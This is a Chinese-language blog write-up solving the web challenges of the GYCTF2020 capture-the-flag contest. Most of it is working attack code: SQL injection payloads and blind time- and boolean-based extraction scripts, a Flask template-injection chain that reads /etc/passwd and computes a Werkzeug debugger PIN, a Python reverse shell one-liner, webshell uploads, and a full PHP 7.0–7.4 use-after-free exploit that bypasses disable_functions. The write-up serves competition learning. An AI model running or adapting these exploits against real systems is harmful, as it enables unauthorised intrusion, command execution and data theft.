GYCTF2020

GYCTF2020Web题解

Web

简单的招聘系统

方法一

直接在登录界面进行注入

-1' union select 1,(SELECT group_concat(flaaag) from flag),3,4,5#

登录用户名即为flag

方法二

万能密码admin’#密码123进入后台，注入点在

pages-blank.php?key=1

时间盲注可以得到flag

easysqli_copy

题目源码

<?php 
    function check($str)
    {
        if(preg_match('/union|select|mid|substr|and|or|sleep|benchmark|join|limit|#|-|\^|&|database/i',$str,$matches))
        {
            print_r($matches);
            return 0;
        }
        else
        {
            return 1;
        }
    }
    try
    {
        $db = new PDO('mysql:host=localhost;dbname=pdotest','root','******');
    } 
    catch(Exception $e)
    {
        echo $e->getMessage();
    }
    if(isset($_GET['id']))
    {
        $id = $_GET['id'];
    }
    else
    {
        $test = $db->query("select balabala from table1");
        $res = $test->fetch(PDO::FETCH_ASSOC);
        $id = $res['balabala'];
    }
    if(check($id))
    {
        $query = "select balabala from table1 where 1=?";
        $db->query("set names gbk");
        $row = $db->prepare($query);
        $row->bindParam(1,$id);
        $row->execute();
    }

考察知识点：

宽字节注入+堆叠注入+prepare预编译注入+时间盲注

prepare预编译注入用法

set @a=0x{hex(payload)};
prepare attack from @a; 
execute attack;

给出解题脚本

# encoding = utf-8
import requests

def main():
    url = 'http://b2098e3e4ab24659ad9ee9d4541294c7666018d77c854686.changame.ichunqiu.com/?id=1%df%27;'
    payloads = "set @a=0x{0};prepare ctftest from @a; execute ctftest;"
    # flag = ''
    tablename=''
    letter = 'abcdefghijklmnopqrstuvwxyz0123456789{}-'
    # for m in range(1, 80):
    for i in range(1,80):
        print(i-1,tablename)
        for j in letter:
            payload = 'select if(substr((select fllllll4g from table1),{0},1)=\'{1}\',sleep(3),0);'.format(i,j)

            try:
                requests.get(url+payloads.format(str_to_hex(payload)),timeout=3)
            except requests.exceptions.ReadTimeout:
                tablename+=j
                break



def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])  # 字符串转换为16进制的函数


if __name__ == '__main__':
    main()

参考文章
https://www.freebuf.com/articles/web/216336.html

ezupload

上传一句话木马，直接getshell，查看flag没有权限，直接执行/readflag可以读取flag

Ezsqli

简单fuzz发现and、or、join、insert、in、union select等关键词都被过滤

简单测试发现True 返回Hello Nu1L，False返回Hello
因为in被过滤，这里使用

sys.schema_table_statistics_with_buffer

给出跑表名的脚本

# -*- coding: UTF-8 -*-
import requests
def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])  # 字符串转换为16进制的函数
dblength=0
#爆破数据库名长度
flag=''
while True:
    data={
    'id':'1 && ((select 1,0x%s7e)>(select * from f1ag_1s_h3r3_hhhhh))'%(str_to_hex(flag))
    # 'id':'1 && (select * from (1,)'%dblength
}
    url='http://66613c0f8c4e49bf8728123a3abaaab1f5ddafe2209a49c4.changame.ichunqiu.com/index.php'
    text=requests.post(url,data).text
    if 'Nu1L' in text:
        break
    else:
        dblength=dblength+1
print("数据库长度为%d"%dblength)

#爆破数据库名
dbname=''
for i in range(dblength):
        for j in range(32,127):
            data={
            'id':'1 && ascii(substr(database(),%d,1))=%d#'%(i+1,j)
}
            url='http://66613c0f8c4e49bf8728123a3abaaab1f5ddafe2209a49c4.changame.ichunqiu.com/index.php'
            # print(data)
            text=requests.post(url,data,proxies={'http':'127.0.0.1:8080'}).text
            if 'Nu1L' in text:
                dbname=dbname+chr(j)
                break
            else:
                continue
print("数据库名为%s"%dbname)

#爆破表数量
tablenum=0
while True:
    data={
    'id':'1 && (select count(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database())=%d#'%tablenum
}
    url='http://66613c0f8c4e49bf8728123a3abaaab1f5ddafe2209a49c4.changame.ichunqiu.com/index.php'
    text=requests.post(url,data).text
    if 'Nu1L' in text:
        break
    else:
        tablenum=tablenum+1
print("表数量为%d"%tablenum)

#爆破表长度
tablelength=[]
for i in range(tablenum):
    temlength=0
    while True:
        data={
        'id':'1 && length(substr((select table_name from sys.schema_table_statistics_with_buffer where table_schema=database() limit %d,1),1))=%d#'%(i,temlength)
}
        url='http://66613c0f8c4e49bf8728123a3abaaab1f5ddafe2209a49c4.changame.ichunqiu.com/index.php'
        text=requests.post(url,data).text
        # print(data)
        if 'Nu1L' in text:
            tablelength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue
print("表的名称长度数组为:",end='%s\n'%tablelength)

#爆破表名
tablename=[]
for i in range(tablenum):
    temname=''
    for j in range(tablelength[i]):
        for k in range(32,127):
            data={
            'id':'1 && ascii(substr((select table_name from sys.schema_table_statistics_with_buffer where table_schema=database() limit %d,1),%d,1))=%d#'%(i,j+1,k)
}
            url='http://66613c0f8c4e49bf8728123a3abaaab1f5ddafe2209a49c4.changame.ichunqiu.com/index.php'
            text=requests.post(url,data).text
            if 'Nu1L' in text:
                temname=temname+chr(k)
                break
            else:
                continue
    tablename.append(temname)
print("表名数组为：",end='%s\n'%tablename)

得到表名为

users233333333333333, f1ag_1s_h3r3_hhhhh

采用无列名注入，给出脚本

import requests
def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])  # 字符串转换为16进制的函数
#爆破flag
flag=''
for i in range(100):
    print(flag)
    for j in range(32,127):
        data={
        'id':'1 && ((select 1,0x%s7e)>(select * from f1ag_1s_h3r3_hhhhh limit 1))'%str_to_hex(flag+chr(j))
}
        # print(flag+chr(j))
        url='http://bc181078ebc74fa1bf820fa32b7e8b3cd6d57500636a4c77.changame.ichunqiu.com/'
        # print(data)
        text=requests.post(url,data).text
        if 'Nu1L' in text:
            flag=flag+chr(j)
            # print(chr(j))
            break
        else:
            continue
# print("flag为%s"%dbname)

# # encoding = utf-8
# import requests
# import time
# url = 'http://bc181078ebc74fa1bf820fa32b7e8b3cd6d57500636a4c77.changame.ichunqiu.com/'
# flag = ''
# for i in range(1,99):
#         for n in range(32,126):
#             a=chr(n).encode().hex()
#             payload = "2-( (select 1,0x%s)>(select * from f1ag_1s_h3r3_hhhhh limit 1))"%(flag.encode().hex()+a)
#             data = {'id': payload}
#             #start_time = time.time()
#             req = requests.post(url, data)
#             print(payload)
#             if 'Nu1L' in req.text:
#                 print("**************       "+chr(n-1))
#                 flag += chr(n-1)
#                 print(flag)
#                 break

得到flag

参考文章 https://blog.csdn.net/a3320315/article/details/104476566

盲注

给出源码

<?php
    # flag在fl4g里
    include 'waf.php';
    header("Content-type: text/html; charset=utf-8"); 
    $db = new mysql();

    $id = $_GET['id'];

    if ($id) {
        if(check_sql($id)){
            exit();
        } else {
            $sql = "select * from flllllllag where id=$id";
            $db->query($sql);
        }
    }
    highlight_file(__FILE__);

fuzz一波过滤了=、rlike、<>，但提示flag在fl4g里，所以采用正则注入

import requests
url='http://7ca07a81da6d4e65b5eaf91de94c3ab9ac6de71d10634d17.changame.ichunqiu.com/?id='
flag=''
for i in range(0,100):
    print(flag)
    for j in "-0123456789abcdefghijklmnopqrstuvwxyz{}":
        id='1 and if((fl4g regexp "^%s"),sleep(3),0)'%(flag+j)
        now_url=url+id
        # print(now_url)
        try:
            requests.get(now_url,timeout=3,proxies={'http':'127.0.0.1:8080'})
        except requests.exceptions.ReadTimeout:
            flag=flag+j
            break

blacklist

改的强网杯的题
waf如下

preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

查询数据库名

1';show databases;

查询表名

1';show tables;

查询列名

1';show columns from FlagHere;

查询数据，因为select被过滤，所以使用handle

1'; handler FlagHere open as hack; handler hack read first; handler hack close;

FlaskApp

参考文章 https://xz.aliyun.com/t/2553

读取/etc/passwd

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}

得到

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/bin/false flaskweb:x:1000:1000::/home/flaskweb:

读取machine-id

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/proc/self/cgroup').read()}}

得到

12:pids:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 11:cpu,cpuacct:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 10:hugetlb:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 9:devices:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 8:blkio:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 7:rdma:/ 6:memory:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 5:perf_event:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 4:net_cls,net_prio:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 3:freezer:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 2:cpuset:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 1:name=systemd:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 0::/system.slice/containerd.service

获取Mac地址

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/sys/class/net/eth0/address').read()}}

得到

02:42:ac:12:00:05
转换为十进制2485377957893

随便输入使得路径报错

/usr/local/lib/python3.7/site-packages/flask/app.py

给出计算pin码的exp

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485377957893',# str(uuid.getnode()),  /sys/class/net/ens33/address
    'ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

运行得到pin码为

224-321-720

进入debug控制台
执行

import os
print(os.popen('ls /').read())
print(os.popen('cat /this_is_the_flag.txt').read())

或者反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("ip",port));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);

得到flag

easy_thinking

thinkphp6漏洞
注册一个账号，在登录的时候修改session为XXX.php(长度为32)
搜索内容输入一句话木马
连接

http://host:port/untime/session/xxx.php

可以getshell
禁用了很多函数，使用exp脚本

<?php

# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=76047
# debug_backtrace() returns a reference to a variable 
# that has been destroyed, causing a UAF vulnerability.
#
# This exploit should work on all PHP 7.0-7.4 versions
# released as of 30/01/2020.
#
# Author: https://github.com/mm0r1

pwn("/readflag");

function pwn($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() { 
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace(); # ;)
            if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {
        # str_shuffle prevents opcache string interning
        $arg = str_shuffle(str_repeat('A', 79));
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; # increase this value if UAF fails
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle(str_repeat('A', 79));

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    # fake closure object
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    # pwn
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

    ($helper->b)($cmd);
    exit();
}

访问exp.php得到flag

本文作者： yd0ng
本文链接： https://yd0ng.github.io/2020/02/25/i%E6%98%A5%E7%A7%8B%E6%96%B0%E6%98%A5%E6%88%98%E5%BD%B9%E5%85%AC%E7%9B%8A%E8%B5%9B%E5%A4%8D%E7%8E%B0/
版权声明： 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处！

赏

谢谢您的打赏，大家一起加油喔~

支付宝

微信